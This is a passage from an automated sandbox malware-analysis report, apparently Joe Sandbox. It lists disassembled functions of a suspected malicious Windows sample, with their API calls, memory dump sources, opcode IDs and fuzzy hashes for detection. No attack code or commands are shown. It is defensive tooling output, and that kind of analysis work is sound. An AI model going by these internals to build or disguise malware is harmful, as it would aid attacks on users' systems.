                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastacceptselect
                                                                                        • String ID:
                                                                                        • API String ID: 385091864-0
                                                                                        • Opcode ID: faa6eeaae3992b80ffff5716d64043fbb861077279e4663798905d57fee2dea9
                                                                                        • Instruction ID: 908e193c395f856dea5d9dc6db021517dc576ff7271428065bd7a1b9707f2dd0
                                                                                        • Opcode Fuzzy Hash: faa6eeaae3992b80ffff5716d64043fbb861077279e4663798905d57fee2dea9
                                                                                        • Instruction Fuzzy Hash: 9221A872A001289FC7119F69DC85A9EBBFCEF89360F004169F949E7290DB74D9419F90
                                                                                        Function 00F48A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F48AA6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F48AC0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F48ACE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F48ADC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 9c047d13a213c9e4006f90131c09f2a06b4fec6561e13b8a3c19b650c43b3558
                                                                                        • Instruction ID: 6c83608ff4ed580969a79ec9104c61d4cc3674c238d7e9376b6ec398142198b6
                                                                                        • Opcode Fuzzy Hash: 9c047d13a213c9e4006f90131c09f2a06b4fec6561e13b8a3c19b650c43b3558
                                                                                        • Instruction Fuzzy Hash: D511BE31745518AFEB04AB28DC05FBE7BD9AF89360F144119FA26D72E1CFB4AC019790
                                                                                        Function 00F20AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F21E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?), ref: 00F21E77
                                                                                          • Part of subcall function 00F21E68: lstrcpyW.KERNEL32(00000000,?,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F21E9D
                                                                                          • Part of subcall function 00F21E68: lstrcmpiW.KERNEL32(00000000,?,00F20ABB,?,?,?,00F2187A,00000000,000000EF,00000119,?,?), ref: 00F21ECE
                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20AD4
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20AFA
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F20B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: 905d266d21adb428f55ce9f68e6b11a4aa44aff84d6dea164c8899c9434d6b5d
                                                                                        • Instruction ID: 564f3496cb05019c6fc18866964d369d9a765af8b701c3769501467a3814a42c
                                                                                        • Opcode Fuzzy Hash: 905d266d21adb428f55ce9f68e6b11a4aa44aff84d6dea164c8899c9434d6b5d
                                                                                        • Instruction Fuzzy Hash: 37119337600315AFDB25AF24EC45E7A77A8FF89364B80406AE906CB251EF719850E7A1
                                                                                        Function 00F12F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00F12FB5
                                                                                          • Part of subcall function 00F0395C: __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F0395C: __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: f796e4da2bacd7a81845179d000508c04da861daec2ccc60dc86a55f7c9a9a8d
                                                                                        • Instruction ID: 572d33e50dd8deccde4aa902689263878402c204c1e54a83cfc6a5695795ba48
                                                                                        • Opcode Fuzzy Hash: f796e4da2bacd7a81845179d000508c04da861daec2ccc60dc86a55f7c9a9a8d
                                                                                        • Instruction Fuzzy Hash: 82110D32D083159BDB313FB4AC0569A3BD8AF04374F208915F84996291DB35D991B690
                                                                                        Function 00F2058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F205AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F205C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F205DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F20632
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        • Opcode ID: 00e179d5483719779457f023ecd3f72597f40592335016fead7b8bdb259a73f2
                                                                                        • Instruction ID: 70291d6104e0cad2b88b0a6f0163840f7841e3105cc26e4ca90e743b7f559d69
                                                                                        • Opcode Fuzzy Hash: 00e179d5483719779457f023ecd3f72597f40592335016fead7b8bdb259a73f2
                                                                                        • Instruction Fuzzy Hash: 10218173A00229EFDB20CF91EC88ADABBB8EF40704F008469E51696151DFB5EA55FF50
                                                                                        Function 00F26713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F26733
                                                                                        • _memset.LIBCMT ref: 00F26754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F267A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F267AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: d32350db7058681499ecbeb95fcb500e9571823c636198239d929718d938b9e9
                                                                                        • Instruction ID: a4bf30c6478af4f67aa73b27cbce54a93df2cabb49842c12bf00683d29554c62
                                                                                        • Opcode Fuzzy Hash: d32350db7058681499ecbeb95fcb500e9571823c636198239d929718d938b9e9
                                                                                        • Instruction Fuzzy Hash: 31110A72D012287AE72057A5BC4DFABBBBCEF44764F10419AF504E71C0D6744E809B74
                                                                                        Function 00F1B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F1AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F1AA79
                                                                                          • Part of subcall function 00F1AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F1AA83
                                                                                          • Part of subcall function 00F1AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F1AA92
                                                                                          • Part of subcall function 00F1AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F1AA99
                                                                                          • Part of subcall function 00F1AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F1AAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00F1ADE4,?,?), ref: 00F1B21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F1B227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F1B22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 00F1B247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: f4ae5e15a2f638b1ccf91091f5f1bd9ae7ece2762ff721686d18f46ed19dd7ab
                                                                                        • Instruction ID: 4f1424165c50df2d66439e56fd82b80e803432017647dee8cbb020d3ea26d78d
                                                                                        • Opcode Fuzzy Hash: f4ae5e15a2f638b1ccf91091f5f1bd9ae7ece2762ff721686d18f46ed19dd7ab
                                                                                        • Instruction Fuzzy Hash: A3118C71A00209FFDB059F98DD85AEEB7A9EF85314F14802DE94297210D775AE88EB10
                                                                                        Function 00F1B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F1B498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F1B4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: fd5bcebd3ee19b3af1404c57fa6df0cb1bd5b317f868ea07c006502c94712d4d
                                                                                        • Instruction ID: ea55f2002fd6f3d61f893b0c71bdde04162056dbbeb90d2cf5d6bb3b0a8b1393
                                                                                        • Opcode Fuzzy Hash: fd5bcebd3ee19b3af1404c57fa6df0cb1bd5b317f868ea07c006502c94712d4d
                                                                                        • Instruction Fuzzy Hash: 0211487A900218FFDB11DFA9C885EDDBBB4FB08710F208091E604B7290D771AE50EB94
                                                                                        Function 00EFB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EFB5A5
                                                                                        • GetClientRect.USER32(?,?), ref: 00F5E69A
                                                                                        • GetCursorPos.USER32(?), ref: 00F5E6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F5E6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: b46cb12b57ba9b49d9b564cf0402779f06b1ad3247345fa9c8d0bc608569b9bd
                                                                                        • Instruction ID: c53cb9fc2837b2aa5db4f836b2ec63c268069e542398726b2b4adff41141d861
                                                                                        • Opcode Fuzzy Hash: b46cb12b57ba9b49d9b564cf0402779f06b1ad3247345fa9c8d0bc608569b9bd
                                                                                        • Instruction Fuzzy Hash: BD113371A0002EBBCF14DF98CC858FE7BB9EB09305F010451EA52E7140E778AA95EBA1
                                                                                        Function 00F2732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F27352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00F27385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F2739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F273A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: f6ac5234559a3a226afa0843432748e3f4d619712489a3c1674c0a5e7a97a6e0
                                                                                        • Instruction ID: 9402690c1574d286fcd10d0ba5e545cc40fa758a551cea6dfdcb68ad8e9e835a
                                                                                        • Opcode Fuzzy Hash: f6ac5234559a3a226afa0843432748e3f4d619712489a3c1674c0a5e7a97a6e0
                                                                                        • Instruction Fuzzy Hash: 7111C8B2E04218AFD701DB68EC05B9E7BED9B45320F144355F925D3291D6B08D14B7B1
                                                                                        Function 00EFD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 00EFD1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 3358e9ac0d75ab7c9f4508a2510102d1ab37e1e4b86991a742f164146a2ea980
                                                                                        • Instruction ID: 54f5e5639e73e8f192ac70a934efdc39794c5eaa9a13cfe9a266b864421e7cb3
                                                                                        • Opcode Fuzzy Hash: 3358e9ac0d75ab7c9f4508a2510102d1ab37e1e4b86991a742f164146a2ea980
                                                                                        • Instruction Fuzzy Hash: 73118EB260650DBFEB014F909C50EEA7F6EFF09368F041111FB14A2150C7729D60ABA0
                                                                                        Function 00F14DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 25f9a8b69b9e231b81ccc92924f455ab5e6dd7bdf94945b3b5da4b896ecf87dc
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: B7014B3640014AFBCF125F84DC128EE3F23BB98765B588555FA2859031D336EAB1BB85
                                                                                        Function 00F07452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F07A0D: __getptd_noexit.LIBCMT ref: 00F07A0E
                                                                                        • __lock.LIBCMT ref: 00F0748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00F074AC
                                                                                        • _free.LIBCMT ref: 00F074BF
                                                                                        • InterlockedIncrement.KERNEL32(01022DD0), ref: 00F074D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: 78c228dc07ba0dc99a4ef07959783c41473420b71f52ede2a3aa5cf0daf02b0b
                                                                                        • Instruction ID: e68ea5454ed2371b4fe644a4e160742f38c46698c189b686a767cff3e2939fb6
                                                                                        • Opcode Fuzzy Hash: 78c228dc07ba0dc99a4ef07959783c41473420b71f52ede2a3aa5cf0daf02b0b
                                                                                        • Instruction Fuzzy Hash: 8F01AD36E09725EBDB22FF64980A75DBB60BB04720F154086F814A76D0CB287910FFC2
                                                                                        Function 00F4DFDE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F4DFF7
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4E00F
                                                                                        • ScreenToClient.USER32(?,?), ref: 00F4E033
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F4E04E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: 213e5bb974b7169d6159e88e173bb5bfbb4f83d5222a26374f731cfd2ef24769
                                                                                        • Instruction ID: 8b99d07aad9be46bbbd2dabc22fd4e333d758a78cc407cd8c5129bdab25c52fe
                                                                                        • Opcode Fuzzy Hash: 213e5bb974b7169d6159e88e173bb5bfbb4f83d5222a26374f731cfd2ef24769
                                                                                        • Instruction Fuzzy Hash: AC114FB9D0020DAFDB01CF98C8849EEBBF9FB08310F108166E925E3210D775AA54DF50
                                                                                        Function 00F07A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00F07AD8
                                                                                          • Part of subcall function 00F07CF4: __mtinitlocknum.LIBCMT ref: 00F07D06
                                                                                          • Part of subcall function 00F07CF4: EnterCriticalSection.KERNEL32(00000000,?,00F07ADD,0000000D), ref: 00F07D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00F07AE5
                                                                                        • __lock.LIBCMT ref: 00F07AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 00F07B17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
